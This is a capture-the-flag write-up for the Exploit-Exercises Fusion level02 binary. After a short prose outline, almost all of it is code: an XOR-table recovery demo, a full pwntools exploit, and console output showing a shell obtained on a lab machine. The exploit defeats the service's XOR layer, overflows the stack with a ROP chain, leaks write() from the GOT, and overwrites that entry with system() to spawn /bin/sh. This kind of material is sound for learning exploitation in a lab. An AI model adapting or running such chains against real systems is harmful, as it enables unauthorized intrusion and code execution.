

[Exploit-Exercise] Fusion level02

Fusion Level02

- The input is XOR-encrypted with a random table, so the first step is to recover that XOR table.

- After that it is just ROP: leak the address of write() and derive system() from the libc offset.

- I simply used system(); another way to get a shell is execve().

- Using execve() would be cleaner and more comfortable when building the payload.
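As an added illustration (not the author's script), the Python 3 snippet below shows why the level's XOR layer offers no protection: with a repeating 128-byte table, a single known plaintext spanning one period recovers the whole table, and the all-zero probe used in this writeup is just the special case where the response is the table itself. The oracle, table and probes are constructed stand-ins for the service, not the real protocol framing.

```python
import os

TABLE_LEN = 128  # the level XORs every buffer against a 128-byte random table


def xor_with_table(data: bytes, table: bytes) -> bytes:
    """Repeating-key XOR: byte i of data is XORed with table[i % len(table)].

    This is the whole 'cipher'; note that it is its own inverse."""
    return bytes(b ^ table[i % len(table)] for i, b in enumerate(data))


def recover_table(plaintext: bytes, ciphertext: bytes,
                  table_len: int = TABLE_LEN) -> bytes:
    """Recover the table from any single known plaintext/ciphertext pair.

    The all-zero probe from the writeup is the special case where
    plaintext XOR ciphertext == ciphertext, i.e. the table comes back verbatim."""
    if len(plaintext) < table_len or len(plaintext) != len(ciphertext):
        raise ValueError("need at least one full table period of known plaintext")
    return bytes(p ^ c for p, c in zip(plaintext[:table_len], ciphertext[:table_len]))


def make_oracle(table: bytes):
    """Constructed stand-in for the level's 'E' command: returns the XORed buffer."""
    return lambda data: xor_with_table(data, table)


def demo() -> dict:
    table = os.urandom(TABLE_LEN)          # constructed stand-in for the random table
    oracle = make_oracle(table)

    # 1. Zero probe, exactly as the writeup does: the response *is* the table.
    zero_probe = bytes(TABLE_LEN)
    from_zeros = recover_table(zero_probe, oracle(zero_probe))

    # 2. Any other known plaintext of one full period works just as well.
    text_probe = (b"known plaintext " * 8)[:TABLE_LEN]   # 16 bytes * 8 = 128
    from_text = recover_table(text_probe, oracle(text_probe))

    # 3. With the table in hand, a sender can pre-XOR a message longer than one
    #    period so that the service's XOR yields exactly the intended bytes.
    message = bytes(range(256)) + b"tail beyond two periods"
    delivered = oracle(xor_with_table(message, from_zeros))

    return {
        "zero_probe_matches": from_zeros == table,
        "text_probe_matches": from_text == table,
        "delivered_intact": delivered == message,
    }
```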

```python
from pwn import *

def send_data(payload):
    # 'E' command: 4-byte little-endian length followed by the data
    s.send("E" + p32(len(payload)) + payload)

def leak_xor_table():
    # 128 zero bytes XORed with the table come back as the table itself
    send_data("\x00"*128)

    s.recv(1024)
    return s.recv(1024)[-128:]

def encrypt(payload, table):
    # Pre-XOR with the leaked table so the service's own XOR yields the raw payload
    enc = ""
    for i in range(len(payload)):
        enc += chr(ord(table[i%128])^ord(payload[i]))
    return enc

cmd = "/bin/sh\x00"
pppr = 0x80499bd          # pop; pop; pop; ret gadget, clears three call arguments
bss = 0x804b420 + 4       # writable scratch area for the command string
read_plt = 0x8048860
write_plt = 0x80489c0
write_got = 0x804b3dc
write_system = 0x847a0    # libc offset write - system on the target

s = remote('192.168.56.136', 20002)

s.recv(1024)

table = leak_xor_table()

payload = "A"*(0x20000 + 0x10)   # padding up to the saved return address

payload += p32(read_plt)
payload += p32(pppr)
payload += p32(0)
payload += p32(bss)
payload += p32(len(cmd))
# read(0, &bss, 8)

payload += p32(write_plt)
payload += p32(pppr)
payload += p32(1)
payload += p32(write_got)
payload += p32(4)
# write(1, write_got, 4)

payload += p32(read_plt)
payload += p32(pppr)
payload += p32(0)
payload += p32(write_got)
payload += p32(4)
# read(0, write_got, 4)

payload += p32(write_plt)
payload += "AAAA"
payload += p32(bss)
# write(bss) -> system(bss) # system("/bin/sh")

payload = encrypt(payload, table)

send_data(payload)
s.recv(1024)

# consume everything the server sends back for the oversized buffer
recv = 0
while recv < len(payload):
        recv += len(s.recv(65536))

s.send("Q")       # 'Q' makes the handler return, which starts the ROP chain
s.send(cmd)       # consumed by read(0, &bss, 8)

write = u32(s.recv(4))   # 4 bytes written from write's GOT entry
print "[+] Write  : %s" % hex(write)
system = write - write_system
print "[+] System : %s" % hex(system)

s.send(p32(system))      # consumed by read(0, write_got, 4): GOT now points at system
s.interactive()
```

```
zero@ubuntu:~/Desktop$ python fusion.py
[+] Opening connection to 192.168.56.136 on port 20002: Done
[+] Write  : 0xb77202c0
[+] System : 0xb769bb20
[*] Switching to interactive mode
$ id
uid=20002 gid=20002 groups=20002
```

